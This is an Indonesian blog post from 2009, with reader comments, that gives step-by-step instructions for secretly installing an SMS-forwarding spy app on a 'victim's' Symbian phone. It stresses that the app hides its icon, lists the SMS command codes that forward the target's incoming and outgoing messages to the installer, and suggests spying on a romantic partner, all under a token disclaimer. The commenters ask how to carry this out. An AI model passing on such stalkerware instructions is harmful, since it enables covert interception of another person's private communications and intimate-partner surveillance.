Trik Rahasia Menyadap SMS Orang Lain

26 Mei 2009 at 05:39 7 komentar

Sebelum membongkar triknya, baca dulu warningnya.๐Ÿ˜€

“Trik ini hanya sebagai bahan pengetahuan semata, jangan sampai dimanfaatkan untuk hal-hal yang berkaitan dengan kejahatan.”

Jika anda menyetujui hal itu, silahkan lanjutkan membaca langkah-langkah trik Rahasia Menyadap SmS dari HP Orang Lain dibawah ini:

1. Dilarang menggunakan trik ini untuk perbuatan yang merugikan orang lain.

2. Anda harus menggunakan HP yang ber-OS (Seperti: Symbian, UIQ .dll) tapi direkomendasikan Nokia Symbian, karena kalau menggunakan yang lain, biasanya akan gagal (Waduh Promosi Euy… :D) dan si korban yang akan disadap pun juga harus demikian.

3. Nah, ini yang paling penting, install-lah aplikasi yang dibutuhkan untuk mengerjakan tugas itu yaitu SmsAnyWhereLite.sis kalau belum punya download dulu klik dini atau langsung ke situs resminya di

SpySmS

install di HP anda dan juga HP si korban yang ingin di sadap SMS-nya.

5. Begitu aplikasi ini diinstall, aplikasi ini tidak akan menampilkan icon apapun di Menu ponsel. Seluruh kontrol dan perintah-perintahnya dilakukan lewat sms, seperti Peng-aktifan dan Mematikan Aplikasi, Mengubah Password dll. Nah.. Itulah kelebihan aplikasi ini, dengan begitu maka orang yang anda sadap tidak akan mengetahui kalau di HP-nya sudah di-install aplikasi Spy ini.

6. Aktifkan aplikasi ini dari HP anda, seperti saya bilang tadi, cara peng-aktifan-nya harus lewat sms, formatnya begini : Ketik REG[spasi]Atp92Keren eh.. salah..๐Ÿ˜€ yang betul begini : Ketik
SA[spasi](Password)[spasi]ON
Panjang password maksimal 8 karakter. Contoh : Misalnya password kamu adalah 12345678 maka yang harus anda ketikan
SA 12345678 ON
kirim sms ini ke nomor anda dan nomor si korban. Untuk mematikan aplikasi ini ketikan sms dengan format begini:
SA[spasi](Password)[spasi]OFF
kirim seperti diatas. Setelah aplikasi itu aktif, maka anda tinggal menjalankan aplikasi itu, aplikasi ini memiliki dua fungsi yaitu:

  • Menyadap Semua SmS yang Masuk ke Inbox HP si Korban
  • Cara menjalankannya ketik sms dengan format:
    SA[spasi](Password)[spasi]R1
    misal
    SA 12345678 R1
    Untuk mematikan fungsi ini, ganti angka 1 dibelakang huruf R menjadi angka 0 seperti ini ketik:
    SA[spasi](Password)[spasi]R0
    (SmS ini dikirim dari HP si korban kirim ke nomor anda)

  • Menyadap Semua SmS yang di kirimkan Oleh si korban
  • Cara menjalankanya ketik sms dengan format:
    SA[spasi](Password)[spasi]S1
    Untuk mematikan fungsi ini ketik:
    SA[spasi](Password)[spasi]S0
    (SmS ini dikirim dari HP si korban kirim ke nomor anda)

    Nah.. dengan begitu, setiap sms yang diterima dan yang dikirimakan si korban akan langsung di teruskan ke inbox anda.

    Aplikasi ini bisa digunakan untuk memonitor SmS di HP pacar anda, jadi kalau pacar anda SmS-an sama orang lain terus mau selingkuh bisa ketahuan deh…hehe๐Ÿ˜€

    Entry filed under: Symbian, Tips & Trik. Tags: , , , , , , , .

    Beberapa Tool dan Aplikasi Facebook yang Menarik WinRAR Password Remover

    7 Komentar Add your own

    • 1. mary  |  15 Juni 2009 pukul 09:58

      wduh ky’y prlu di cba nih, tp klo blh tny ms seh cm tipe hp symbian aja seh, emang’y ga da aplikasi buat hp selain nokia apalg bkn tipe symbian? krm y blz’ny k email aku

      Balas
      • 2. tepz  |  15 Juni 2009 pukul 11:27

        silahkan coba… nampaknya baru ada yang but hp ber os symbian aja… kalo but hp lain sy belum tahu..hehe

        Balas
    • 3. tedo  |  3 Agustus 2009 pukul 22:56

      mantabbb tu.,brrt applikasi ney ga bs d kirim lwt bluetooth y?

      Balas
    • 4. ikhwan  |  22 September 2009 pukul 16:06

      om misalkan kita menyadap sms yang di kirim oleh si korban, jd kn korban ngirim sms nya dua kali, satu ke no. tujuan satu lg ke kita, pertanyaan nya apa sms yang ke kita itu akan terkena biaya kirim juga?

      Balas
    • 5. Mitra Komputer  |  25 September 2009 pukul 15:16

      Thanx Banget Infonya,

      Balas
    • 6. Kepil Youth Centre  |  29 September 2009 pukul 20:26

      cah kepil emang pinteeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeer

      Balas
    • 7. Nurul Azisyah Aura  |  28 Maret 2012 pukul 17:00

      itu passwornya, password pada hp saat dikunci atau apa ?

      Balas

    Tinggalkan Balasan

    Isikan data di bawah atau klik salah satu ikon untuk log in:

    Logo WordPress.com

    You are commenting using your WordPress.com account. Logout / Ubah )

    Gambar Twitter

    You are commenting using your Twitter account. Logout / Ubah )

    Foto Facebook

    You are commenting using your Facebook account. Logout / Ubah )

    Foto Google+

    You are commenting using your Google+ account. Logout / Ubah )

    Connecting to %s

    Trackback this post  |  Subscribe to the comments via RSS Feed


    Kalender

    Mei 2009
    M S S R K J S
        Jun »
     12
    3456789
    10111213141516
    17181920212223
    24252627282930
    31  

    Klik tertinggi

    • Tak ada

    Sumber Dollar

    AWsurveys PayPal
    Ziddu ClixSense MoreNiche

    Asal Para Pengunjung

    free counters

    Yang Sedang Online

    BEWARA!!!

    KUNJUNGI JUGA BLOG TERBARU SAYA di www.benkerenz.co.cc
    Terima Kasih.

    %d blogger menyukai ini: